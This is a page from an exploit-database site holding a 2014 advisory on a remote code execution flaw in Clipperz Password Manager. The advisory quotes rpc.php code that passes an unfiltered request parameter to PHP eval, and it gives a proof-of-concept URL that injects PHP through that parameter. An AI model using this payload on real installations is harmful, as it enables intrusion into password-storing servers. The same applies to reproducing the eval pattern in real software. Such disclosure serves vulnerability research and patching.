0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Clipperz Password Manager Code Execution Vulnerability

Author

Manish Tanwar

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

############################################################################### 
# Exploit Title   : Clipperz Password Manager remote code execution vulnerability
# Author          : Manish Kishan Tanwar  
# Vendor          : https://clipperz.is/open_source/clipperz_password_manager/ 
# Download Link   : https://codeload.github.com/clipperz/password-manager/zip/master
# Date            : 19/05/2014 
#Discovered @     : INDISHELL Lab
# Love to         : zero cool,Team indishell,Hardeep Singh
############################################################################## 
////////////////////////
/// Overview: 
//////////////////////// 
Clipperz Password Manager script is affected from remote code execution Vulnerabilities. 

///////////////////////////////
// Vulnerability Description: 
///////////////////////////////

there is remote code execution flaw in Clipperz Password Manager script, because it does not checking user user inputs before final processing. 

  Input passed via the "objectname" parameter to "password-manager-master/backend/php/src/setup/rpc.php" is not  properly verified before it is give to server for processing. This can be exploited to execute php code.

//////////////////////////////
///  Proof of Concept: -
//////////////////////////////
vulnerability arises because of following code in file rpc.php
at line number 
15.  $objectName = isset($_REQUEST['objectname']) ? $_REQUEST['objectname'] : '';

37. eval ('$instance = new '.$objectName.'();');

value in objectname parameter is not getting filter before using it at line number 37 and user input is getting eval which is causing remote code execution vulnerability.

/////////////////////////
/// example exploit  
////////////////////////

http://127.0.0.111/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die

#  0day.today [2024-10-06]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Clipperz Password Manager Code Execution Vulnerability

Report Error

Report Error